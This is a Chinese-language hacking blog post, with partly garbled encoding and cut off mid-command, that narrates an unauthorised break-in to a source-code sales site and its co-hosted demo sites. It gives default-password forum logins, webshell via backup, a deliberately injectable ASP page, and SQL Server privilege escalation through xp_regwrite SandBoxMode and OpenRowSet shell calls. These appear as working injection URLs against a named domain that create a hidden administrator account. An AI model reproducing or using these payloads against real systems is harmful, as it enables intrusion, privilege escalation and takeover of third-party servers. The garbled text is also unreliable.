艱難滲透源碼銷售站點(diǎn)

1、艱難滲透源碼銷售站點(diǎn)題外話:最近想做幾個(gè)垃圾站玩玩。可手上又沒(méi)有啥好程序。郁悶。那些網(wǎng)上免費(fèi)的程序又沒(méi)多少好玩意。百度看看網(wǎng)上誰(shuí)賣程序。方便的話,搞幾個(gè)下來(lái)玩玩好了。一:小碰頭:百度上找了一會(huì), 看到這個(gè)站上有幾個(gè)我喜歡的程序。咋辦?試試看吧。當(dāng)時(shí)一看這站,哪像個(gè)出售源碼程序的站。這么丑。用的啥系統(tǒng)我想大家不說(shuō)我說(shuō)也知道了吧。當(dāng)然,人家手上既然有這么多源碼,想必也是通過(guò)自己的入侵手段搞來(lái)的。那他的主站也根本上就不需要看了。隨便在一個(gè)url上添加個(gè)單引號(hào)出現(xiàn)了這個(gè)。加了防注入了.算了。不錯(cuò)主站入手了。拿出我們最喜歡的東西吧。()查到同一效勞器上有這些站。有53個(gè)站。心里開(kāi)心了。旁注有望啊。從主站

2、也得知這些網(wǎng)站都是網(wǎng)站管理員的出售中的程序。所以給他們分配的也都是2級(jí)域名。大家會(huì)想了。2級(jí)域名?會(huì)不會(huì)如果直接搞定一個(gè)webshell,就可以得到所有程序呢?因?yàn)樗麄冞@些演示站點(diǎn)或許會(huì)是在主站的下級(jí)目錄吧。當(dāng)初我也這么想的。先不說(shuō)這個(gè)了。下面我們開(kāi)始吧。我首先瞄準(zhǔn)了大家看到了什么?對(duì),論壇。而且是動(dòng)網(wǎng)7.1的。不是吧?這么簡(jiǎn)單就可以搞到一個(gè)webshell了？還賣源碼呢.唉。動(dòng)網(wǎng)默認(rèn)的密碼就進(jìn)去了。咱們登陸后臺(tái)拿webshell吧。Dvbbs7.1首先考慮后臺(tái)導(dǎo)出模板然后備份拿webshell.然后就導(dǎo)出了。問(wèn)題也就來(lái)了。去看看備份數(shù)據(jù)庫(kù)那里能否備份。是可以備份的。導(dǎo)出模板不可以。上傳文件總

3、還是會(huì)允許的吧?結(jié)果無(wú)論我上傳什么類型的文件。無(wú)論我怎么偽造文件。都顯示這個(gè)。難怪管理員會(huì)這么放心的把密碼設(shè)為默認(rèn)的。我想大概是方便購(gòu)置的人查看吧。想了想。要是這樣的話?那不會(huì)所有的2級(jí)網(wǎng)站都是這樣吧？我是個(gè)不服輸?shù)娜?。大不了一個(gè)一個(gè)試。不就53個(gè)網(wǎng)站么？經(jīng)歷了“無(wú)數(shù)的數(shù)據(jù)庫(kù)只讀,無(wú)寫入權(quán)限等問(wèn)題。幾乎所有的2級(jí)都是這樣?？磥?lái)管理員還是挺有意識(shí)。為難了。怎么辦？不會(huì)就這么放棄吧。二：峰回路轉(zhuǎn)。我沒(méi)有放棄。接著又找到一動(dòng)網(wǎng)7.1默認(rèn)密碼。 : 哈哈。百密終有一疏啊。這么多的站?？偹氵€有一個(gè)沒(méi)把權(quán)限給卡住啊。成功導(dǎo)出后。然后通過(guò)備份拿到一個(gè)webshell.終于嘆了口氣。搞了大半天終于拿到了一個(gè)w

4、ebshell.提權(quán)吧。無(wú)ws無(wú)任何第3方可以直接利用軟件。Aspx的馬馬運(yùn)行不了(其實(shí)效勞器是支持.net的)。跳轉(zhuǎn)的d:/web/ 跳轉(zhuǎn)不了唉。提權(quán)無(wú)望啊。又不知道其他目錄的名稱。社工了好幾個(gè),都不能跳轉(zhuǎn)。想了想,同級(jí)目錄會(huì)不會(huì)允許跳轉(zhuǎn)呢?帶著僥幸的心理嘗試了下。大家會(huì)說(shuō)了,根本就不知道其他的網(wǎng)站目錄其實(shí)要想知道一個(gè)同級(jí)目錄也不難。剛剛咱們不是還有個(gè)動(dòng)網(wǎng)默認(rèn)密碼的沒(méi)搞下來(lái)么?大家有沒(méi)想到什么？動(dòng)網(wǎng)后臺(tái)在數(shù)據(jù)處理的系統(tǒng)信息檢測(cè)可以看到網(wǎng)站的路徑的。呵呵。對(duì)了。(其實(shí)還有的其他幾個(gè)站點(diǎn)可以通過(guò)aspcheck.asp來(lái)得知的。)哈哈。跳轉(zhuǎn)成功。但也就只能跳這個(gè)三級(jí)目錄。不過(guò)不要緊。舒服的東西在

5、下面呢。習(xí)慣性的看了下數(shù)據(jù)庫(kù)連接文件。strconn = "driver=sql server;server=(local);uid=xxx;pwd=xxx;database=xxx"呵呵。是個(gè)SQL的數(shù)據(jù)庫(kù)。試試是否可以上傳文件到這個(gè)站。唉。權(quán)限還是不夠啊。那就用SQLtool直接連接吧。我暈。怎么可能呢?密碼難道錯(cuò)誤?不會(huì)啊。重新找了一下數(shù)據(jù)庫(kù)連接我文件。也就那么一個(gè)。那到底怎么回事呢?很明顯,禁止了外部連接1433端口。如果是這樣的話那好辦。傳個(gè)SQLrootkit就可以了。事實(shí)證明了這一點(diǎn)。我用webshell自帶的SQL連接工具連接了。在我意料之中。這僅僅是個(gè)db

6、權(quán)限的數(shù)據(jù)庫(kù)而已。Db權(quán)限的數(shù)據(jù)庫(kù)？大家想到了什么？呵呵。對(duì)了。Db 權(quán)限的注入點(diǎn)可以列目錄啊。既然效勞器允許我們跳轉(zhuǎn)到3級(jí)目錄(這只是暫時(shí)的猜測(cè),因?yàn)楫吘箷簳r(shí)只有一個(gè)3級(jí)目錄被我們跳轉(zhuǎn)了)。XP_CMDSHELL. 存在!SP_OACREATE. 存在!XP_REGWRITE. 存在!XP_SERVICECONTROL 存在!經(jīng)查詢。這些都還在。那就好辦了。直接構(gòu)造注入點(diǎn)吧。<!-#include file="xx.asp"-><%set rs=server.createobject("ADODB.recordset")id = re

7、quest("id")strSQL ="select * from admin where id="& id rs.open strSQL,conn,1,3rs.close%>這里的admin必須是一個(gè)存在的表名。我們可以通過(guò)SQL連接工具執(zhí)行SQL命令查詢。select name from sysobjects where type='U'查詢出我們需要的表名。或者我也在 ./conn/encode.asp這個(gè)文件里找到這一句。sql="select count (*) from login where id=&

8、quot;&cint(myid)很明顯。這里的login就可以被我們用上。strSQL = "select * from login where id=" & id 我們構(gòu)造出這樣的語(yǔ)句替換到上面的代碼中。至此。終于有了突破。成功構(gòu)造了注入點(diǎn)。呵呵。能夠列出目錄了。我們現(xiàn)在會(huì)想。要想搞到3389的終極權(quán)限?，F(xiàn)在只能靠1433這個(gè)口子了。既然效勞器支持我們跳轉(zhuǎn)到某些目錄。那咱們一一試過(guò)去不就行了。事情證明。找1433實(shí)在是太辛苦了。有的人大概會(huì)一個(gè)目錄一個(gè)目錄的去找吧。但有的網(wǎng)站只是access的。其實(shí)這也是我當(dāng)初的做法。后來(lái)兄弟可酷可樂(lè)告訴我。直接列出這個(gè)目

9、錄d:Program FilesMicrosoft SQL ServerMSSQLData數(shù)據(jù)庫(kù)的前綴根本上是有規(guī)律的。那就是跟二級(jí)域名很相似。直接去找那些目錄就可以了。這樣就可以省下很多事。找到目錄后,一一的在webshell上跳轉(zhuǎn)。很順利。在通過(guò)幾次觀察后。管理員把SQL帳戶設(shè)置的很有規(guī)律。aaa1 aaa2 aaa3 aaa4 aaa5 而密碼有都是一樣的。我這個(gè)人就是懶,喜歡偷懶。那這些用戶中會(huì)否有一個(gè)是SA的權(quán)限呢？趕緊去一個(gè)一個(gè)試。我從aaa1試到aaa16。呵呵。恭喜！SQL SERVER最高權(quán)限。還等什么？趕緊net user 吧。xpsql.cpp: 錯(cuò)誤 5 來(lái)自 Crea

10、teProcess第 737 行郁悶了。出現(xiàn)了這樣的情況。沒(méi)有足夠的權(quán)限創(chuàng)立進(jìn)程。難道不是SA權(quán)限? SA都被降權(quán)了?c:windowssystem32cmd.exe沒(méi)有被刪啊那怎么辦？想要用SQL查詢分析器連接吧，但1433又不對(duì)外開(kāi)放。外部不可以連接。想把效勞器上的1433端口轉(zhuǎn)發(fā)到本地吧。又無(wú)ws.網(wǎng)上查了查資料。用沙盒模式提權(quán)來(lái)試下再來(lái)構(gòu)造個(gè)個(gè)SA的注入點(diǎn)。這不難。繼續(xù)構(gòu)造。再次執(zhí)行select name from sysobjects where type='U'查詢myadmin這個(gè)數(shù)據(jù)庫(kù)中的表名。好了。成功構(gòu)造出來(lái)了。接著就是沙盒模式提權(quán)了。 :/haoteach

11、er.200ym /Manage/Include/sql.asp?id=1;EXEC%20master.dbo.xp_regwrite%20'HKEY_LOCAL_MACHINE','SoftWareMicrosoftJet4.0Engines','SandBoxMode','REG_DWORD',0;- :/haoteacher.200ym /Manage/Include/sql.asp?id=1;Select*From OpenRowSet('Microsoft.Jet.OLEDB.4.0','Data

12、base=c:windowssystem32iasias.mdb','select shell("net user aloner$ aloner /add")');- :/haoteacher.200ym /Manage/Include/sql.asp?id=1;Select*From OpenRowSet('Microsoft.Jet.OLEDB.4.0','Database=c:windowssystem32iasias.mdb','select shell("net localgroup adm

13、inistrators aloner$ /add")');-返回正常。說(shuō)明成功了?；蛘哂肏DSI 執(zhí)行下面這些SQL命令。EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWareMicrosoftJet4.0Engines','SandBoxMode','REG_DWORD',0Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0','Database=c:windowssystem32iasias.mdb','select shell("net user aloner aloner /add")');Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0','Database=c:win